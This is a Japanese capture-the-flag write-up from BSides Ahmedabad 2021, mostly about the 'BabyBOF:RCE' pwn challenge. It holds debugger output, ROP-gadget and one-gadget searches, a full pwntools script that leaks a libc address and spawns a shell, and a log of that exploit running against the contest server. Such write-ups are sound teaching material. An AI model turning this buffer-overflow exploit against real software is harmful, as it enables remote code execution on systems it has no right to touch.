この大会は2021/11/6 12:00(JST)~2021/11/7 12:00(JST)に開催されました。
今回もチームで参戦。結果は268点で314チーム中75位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome (welcome)
Discordに入り、#announcementsチャネルのメッセージを見ると、フラグが書いてあった。
Neko{me0w_much_p0in75_wi11_y0u_ge7?}
BabyBOF:RCE (pwn)
GOT領域のアドレスをリークし、libcのbaseアドレスを算出してからmainに飛ばし、2周目でOne Gadget RCEを行う。
$ gdb -q ./vuln Reading symbols from ./vuln...(no debugging symbols found)...done. gdb-peda$ pattc 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /mnt/hgfs/Shared/vuln Enter your feedback: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' Thank you! Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7ffff7af2224 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000) RDX: 0x7ffff7dcf8c0 --> 0x0 RSI: 0x7ffff7dce7e3 --> 0xdcf8c0000000000a RDI: 0x1 RBP: 0x401210 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffde68 ("IAAeAA4AAJAAfAA"...) RIP: 0x40111b (<main+107>: ret) R8 : 0xa (b'\n') R9 : 0x0 R10: 0x0 R11: 0x246 R12: 0x401120 (<_start>: endbr64) R13: 0x7fffffffdf40 --> 0x1 R14: 0x0 R15: 0x0 [------------------------------------code-------------------------------------] Display various information of current execution context Usage: context [reg,code,stack,all] [code/stack length] 0x000000000040111b in main () gdb-peda$ patto IAAeAA4AAJAAfAA IAAeAA4AAJAAfAA found at offset: 72 $ ROPgadget --binary ./vuln | grep "pop rdi" 0x0000000000401273 : pop rdi ; ret $ one_gadget libc-2.31.so 0xe6c7e execve("/bin/sh", r15, r12) constraints: [r15] == NULL || r15 == NULL [r12] == NULL || r12 == NULL 0xe6c81 execve("/bin/sh", r15, rdx) constraints: [r15] == NULL || r15 == NULL [rdx] == NULL || rdx == NULL 0xe6c84 execve("/bin/sh", rsi, rdx) constraints: [rsi] == NULL || rsi == NULL [rdx] == NULL || rdx == NULL
from pwn import * if len(sys.argv) == 1: p = remote('pwn2.bsidesahmedabad.in', 9001) else: p = process('./vuln') elf = ELF('./vuln') libc = ELF('./libc-2.31.so') pop_rdi_addr = 0x401273 puts_got_addr = elf.got['puts'] puts_plt_addr = elf.plt['puts'] main_addr = elf.symbols['main'] one_gadget_addr = 0xe6c81 payload = 'A' * 72 payload += p64(pop_rdi_addr) payload += p64(puts_got_addr) payload += p64(puts_plt_addr) payload += p64(main_addr) data = p.recvline().rstrip() print data print payload p.sendline(payload) data = p.recvline().rstrip() print data data = p.recv(7).rstrip() print data leaked_puts_got = u64(data + '\x00\x00') log.info('leaked puts got address: ' + hex(leaked_puts_got)) libc_base = leaked_puts_got - libc.symbols['puts'] log.info('libc base address: ' + hex(libc_base)) system_addr = libc_base + libc.symbols['system'] log.info('system address: ' + hex(system_addr)) payload = 'A' * 72 payload += p64(libc_base + one_gadget_addr) data = p.recvline().rstrip() print data print payload p.sendline(payload) data = p.recvline().rstrip() print data p.interactive()
実行結果は以下の通り。
[+] Opening connection to pwn2.bsidesahmedabad.in on port 9001: Done [*] '/mnt/hgfs/Shared/vuln' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [*] '/mnt/hgfs/Shared/libc-2.31.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Enter your feedback: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAs\x12\x00\x00\x00@@\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00 Thank you! \xa0u%/r\x7f [*] leaked puts got address: 0x7f722f2575a0 [*] libc base address: 0x7f722f1d0000 [*] system address: 0x7f722f225410 Enter your feedback: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x81l+/r\x7f\x00 Thank you! [*] Switching to interactive mode $ ls flag-5e95a44ed973de7e2bbf18e0e76ad496.txt vuln $ cat flag-5e95a44ed973de7e2bbf18e0e76ad496.txt Neko{Th4t's_4_n1c3_f33db4ck}
Neko{Th4t's_4_n1c3_f33db4ck}
Survey (survey)
アンケートに答えたら、フラグが表示された。
Neko{thank-you-for-playing-and-answering-the-survey!}